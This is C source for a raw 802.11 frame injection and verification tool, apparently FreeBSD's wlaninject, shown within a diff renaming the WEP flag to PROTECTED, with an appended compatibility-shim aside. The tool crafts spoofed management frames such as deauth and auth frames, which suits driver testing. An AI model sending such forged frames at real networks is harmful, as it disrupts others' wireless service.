"ac_be") || equal(ac, "be")) return WME_AC_BE; if (equal(ac, "ac_bk") || equal(ac, "bk")) return WME_AC_BK; if (equal(ac, "ac_vi") || equal(ac, "vi")) return WME_AC_VI; if (equal(ac, "ac_vo") || equal(ac, "vo")) return WME_AC_VO; errx(1, "unknown wme access class %s", ac); #undef equal } int str2rate(const char *rate) { switch (atoi(rate)) { case 54: return 54*2; case 48: return 48*2; case 36: return 36*2; case 24: return 24*2; case 18: return 18*2; case 12: return 12*2; case 9: return 9*2; case 6: return 6*2; case 11: return 11*2; case 5: return 11; case 2: return 2*2; case 1: return 1*2; } errx(1, "unknown transmit rate %s", rate); } const char *rate2str(int rate) { static char buf[30]; if (rate == 11) return "5.5"; snprintf(buf, sizeof(buf), "%u", rate/2); return buf; } int load_payload(char *fname, void *buf, int len) { int fd; int rc; if ((fd = open(fname, O_RDONLY)) == -1) err(1, "open()"); if ((rc = read(fd, buf, len)) == -1) err(1, "read()"); close(fd); printf("Read %d bytes from %s\n", rc, fname); return rc; } int header_len(struct ieee80211_frame *wh) { int len = sizeof(*wh); switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_MGT: switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: len += 2 + 2; /* capa & listen */ break; case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: len += 2 + 2 + 2; /* capa & status & assoc */ break; case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: len += 2 + 2 + 6; /* capa & listen & AP */ break; case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: len += 2 + 
2 + 2; /* capa & status & assoc */ break; case IEEE80211_FC0_SUBTYPE_PROBE_REQ: case IEEE80211_FC0_SUBTYPE_ATIM: break; case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: len += 8 + 2 + 2; /* time & bint & capa */ break; case IEEE80211_FC0_SUBTYPE_DISASSOC: len += 2; /* reason */ break; case IEEE80211_FC0_SUBTYPE_AUTH: len += 2 + 2 + 2; /* algo & seq & status */ break; case IEEE80211_FC0_SUBTYPE_DEAUTH: len += 2; /* reason */ break; default: errx(1, "Unknown MGT subtype 0x%x", wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK); } break; case IEEE80211_FC0_TYPE_CTL: switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_PS_POLL: len = sizeof(struct ieee80211_frame_pspoll); break; case IEEE80211_FC0_SUBTYPE_RTS: len = sizeof(struct ieee80211_frame_rts); break; case IEEE80211_FC0_SUBTYPE_CTS: len = sizeof(struct ieee80211_frame_cts); break; case IEEE80211_FC0_SUBTYPE_ACK: len = sizeof(struct ieee80211_frame_ack); break; case IEEE80211_FC0_SUBTYPE_CF_END_ACK: case IEEE80211_FC0_SUBTYPE_CF_END: len = sizeof(struct ieee80211_frame_cfend); break; default: errx(1, "Unknown CTL subtype 0x%x", wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK); } break; case IEEE80211_FC0_TYPE_DATA: if (wh->i_fc[1] & IEEE80211_FC1_DIR_DSTODS) len += sizeof(wh->i_addr1); break; default: errx(1, "Unknown type 0x%x", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK); exit(1); } return len; } int parse_ie(char *str, unsigned char *ie, int len) { int digits = 0; char num[3]; int conv = 0; int ielen; ielen = strlen(str)/2; if (ielen < 1 || (strlen(str) % 2)) { printf("Invalid IE %s\n", str); exit(1); } num[2] = 0; while (ielen) { num[digits++] = *str; str++; if (digits == 2) { unsigned int x; sscanf(num, "%x", &x); if (len <= 0) { printf("No space for IE\n"); exit(1); } *ie++ = (unsigned char) x; len--; ielen--; /* first char */ if (conv == 0) { if (len == 0) { printf("No space for IE\n"); exit(1); } *ie++ = (unsigned char) ielen; len--; conv++; } conv++; digits = 0; } } return conv; } int possible_match(struct ieee80211_frame *sent, int slen, struct ieee80211_frame *got, int glen) { if (slen != glen) return 0; if (memcmp(sent->i_addr1, got->i_addr1, 6) != 0) printf("Addr1 doesn't match\n"); if ((sent->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != (got->i_fc[0] & IEEE80211_FC0_TYPE_MASK)) return 0; if ((sent->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) != (got->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK)) return 0; /* Good enough for CTL frames I guess */ if ((got->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) return 1; if (memcmp(sent->i_addr2, got->i_addr2, 6) == 0 && memcmp(sent->i_addr3, got->i_addr3, 6) == 0) return 1; return 0; } int do_verify(struct ieee80211_frame *sent, int slen, void *got, int glen) { #define BIT(n) (1<<(n)) struct bpf_hdr *bpfh = got; struct ieee80211_frame *wh; struct ieee80211_radiotap_header *rth; int i; unsigned char *ptr, *ptr2; uint32_t present; uint8_t rflags; /* get the 802.11 header */ glen -= bpfh->bh_hdrlen; assert(glen > 0); if (bpfh->bh_caplen != glen) { abort(); } rth = (struct ieee80211_radiotap_header*) ((char*) bpfh + bpfh->bh_hdrlen); glen -= rth->it_len; assert(glen > 0); wh = (struct ieee80211_frame*) ((char*)rth + rth->it_len); /* check if FCS/CRC is included in packet */ present = le32toh(rth->it_present); if (present & BIT(IEEE80211_RADIOTAP_FLAGS)) { if (present & BIT(IEEE80211_RADIOTAP_TSFT)) rflags = ((const uint8_t *)rth)[8]; else rflags = ((const uint8_t *)rth)[0]; } else rflags = 0; if (rflags & IEEE80211_RADIOTAP_F_FCS) glen -= IEEE80211_CRC_LEN; 
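/* With any radiotap-reported FCS stripped, glen covers only the 802.11 header and body, so the received frame can be compared byte-for-byte against what was injected. */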
assert(glen > 0); /* did we receive the packet we sent? */ if (!possible_match(sent, slen, wh, glen)) return 0; /* check if it got mangled */ if (memcmp(sent, wh, slen) == 0) { printf("No mangling---got it perfect\n"); return 1; } /* print differences */ printf("Got mangled:\n"); ptr = (unsigned char*) sent; ptr2 = (unsigned char *) wh; for (i = 0; i < slen; i++, ptr++, ptr2++) { if (*ptr != *ptr2) printf("Position: %d Was: %.2X Got: %.2X\n", i, *ptr, *ptr2); } return -1; #undef BIT } int main(int argc, char *argv[]) { int fd, fd2; char *iface = "wlan0"; char *verify = NULL; int chan = 1; struct { struct ieee80211_frame w; unsigned char buf[2048]; } __packed u; int len = 0; int ch; struct ieee80211_bpf_params params; struct ieee80211_frame *wh = &u.w; unsigned char *body = u.buf; memset(&u, 0, sizeof(u)); memset(&params, 0, sizeof(params)); params.ibp_vers = IEEE80211_BPF_VERSION; params.ibp_len = sizeof(struct ieee80211_bpf_params) - 6, params.ibp_rate0 = 2; /* 1 MB/s XXX */ params.ibp_try0 = 1; /* no retransmits */ params.ibp_power = 100; /* nominal max */ params.ibp_pri = WME_AC_VO; /* high priority */ while ((ch = getopt(argc, argv, "hv:t:s:TFmpdwou:1:2:3:4:b:i:c:l:n:f:e:S:a:A:C:NRV:W:X:P:")) != -1) { switch (ch) { case 'i': iface = optarg; break; case 'c': chan = atoi(optarg); break; case 'v': wh->i_fc[0] |= atoi(optarg)& IEEE80211_FC0_VERSION_MASK; break; case 't': wh->i_fc[0] |= str2type(optarg) << IEEE80211_FC0_TYPE_SHIFT; break; case 's': wh->i_fc[0] |= str2subtype(optarg) << IEEE80211_FC0_SUBTYPE_SHIFT; len = header_len(wh); body += len; break; case 'T': wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; break; case 'F': wh->i_fc[1] |= IEEE80211_FC1_DIR_FROMDS; break; case 'm': wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; break; case 'r': wh->i_fc[1] |= IEEE80211_FC1_RETRY; break; case 'p': wh->i_fc[1] |= IEEE80211_FC1_PWR_MGT; break; case 'd': wh->i_fc[1] |= IEEE80211_FC1_MORE_DATA; break; case 'w': - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; break; case 'o': wh->i_fc[1] |= IEEE80211_FC1_ORDER; break; case 'u': *(uint16_t*)wh->i_dur = htole16(atoi(optarg)); break; case '1': str2mac(wh->i_addr1, optarg); break; case '2': str2mac(wh->i_addr2, optarg); break; case '3': str2mac(wh->i_addr3, optarg); break; case '4': str2mac(body, optarg); break; case 'n': *(uint16_t*)wh->i_seq |= htole16((atoi(optarg) & 0xfff) << IEEE80211_SEQ_SEQ_SHIFT); break; case 'f': wh->i_seq[0] |= atoi(optarg) & 0xf; break; case 'b': len += load_payload(optarg, body, u.buf + sizeof(u.buf) - body); break; case 'l': len = atoi(optarg); break; case 'e': do { int ln; ln = parse_ie(optarg, body, u.buf + sizeof(u.buf) - body); len += ln; body += ln; } while(0); break; case 'S': do { int ln; int left = u.buf + sizeof(u.buf) - body; ln = strlen(optarg) & 0xff; if ((ln + 2) > left) { printf("No space for SSID\n"); exit(1); } *body++ = 0; *body++ = ln; memcpy(body, optarg, ln); body += ln; len += ln + 2; } while(0); break; case 'R': do { unsigned char rates[] = "\x1\x4\x82\x84\xb\x16"; int left = u.buf + sizeof(u.buf) - body; if ((sizeof(rates) - 1) > left) { printf("No space for rates\n"); exit(1); } memcpy(body, rates, sizeof(rates) - 1); body += sizeof(rates) - 1; len += sizeof(rates) - 1; } while(0); break; case 'a': do { uint16_t *x = (uint16_t*) (wh+1); *x = htole16(atoi(optarg)); } while(0); break; case 'A': do { uint16_t *x = (uint16_t*) (wh+1); x += 1; *x = htole16(atoi(optarg)); } while(0); break; case 'C': do { uint16_t *x = (uint16_t*) (wh+1); if ((wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) == 
IEEE80211_FC0_SUBTYPE_AUTH) x += 1; x += 1; *x = htole16(atoi(optarg)); } while(0); break; case 'N': params.ibp_flags |= IEEE80211_BPF_NOACK; break; case 'V': verify = optarg; break; case 'W': params.ibp_pri = str2wmeac(optarg); break; case 'X': params.ibp_rate0 = str2rate(optarg); break; case 'P': params.ibp_power = atoi(optarg); break; case 'h': default: usage(argv[0]); break; } } if (!len) { usage(argv[0]); exit(1); } printf("Using interface %s on chan %d, transmit at %s Mbp/s\n", iface, chan, rate2str(params.ibp_rate0)); setup_if(iface, chan); fd = open_bpf(iface); printf("Dose: %db\n", len); if (verify) { setup_if(verify, chan); fd2 = open_bpf(verify); } inject(fd, wh, len, &params); close(fd); if (verify) { char buf2[4096]; int rc; int max = 10; int timeout = 2; fd_set fds; struct timeval tv; time_t start; printf("Verifying via %s\n", verify); start = time(NULL); while (max--) { FD_ZERO(&fds); FD_SET(fd2, &fds); tv.tv_usec = 0; tv.tv_sec = time(NULL) - start; if (tv.tv_sec >= timeout) { timeout = 0; break; } tv.tv_sec = timeout - tv.tv_sec; if (select(fd2+1, &fds, NULL, NULL, &tv) == -1) err(1, "select()"); if (!FD_ISSET(fd2, &fds)) continue; if ((rc = read(fd2, buf2, sizeof(buf2))) == -1) err(1, "read()"); if (do_verify(wh, len, buf2, rc)) { max = 666; break; } } if (max != 666 || !timeout) printf("No luck\n"); close(fd2); } exit(0); }
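An illustrative aside, not part of the patch: since only the macro's name changes (the frame-control bit it selects stays the same), out-of-tree code that still spells the flag IEEE80211_FC1_WEP can keep building against either header generation with a small compatibility shim. A minimal sketch follows; the <net80211/ieee80211.h> include path and the frame_is_protected() helper are assumptions made for the example, not APIs introduced by this commit.

#include <net80211/ieee80211.h>

/* Define whichever spelling the installed header lacks in terms of the one it provides. */
#ifndef IEEE80211_FC1_PROTECTED
#define IEEE80211_FC1_PROTECTED IEEE80211_FC1_WEP
#endif
#ifndef IEEE80211_FC1_WEP
#define IEEE80211_FC1_WEP IEEE80211_FC1_PROTECTED
#endif

/* Hypothetical helper: non-zero when the frame body is cryptographically protected. */
static inline int
frame_is_protected(const struct ieee80211_frame *wh)
{
	return (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) != 0;
}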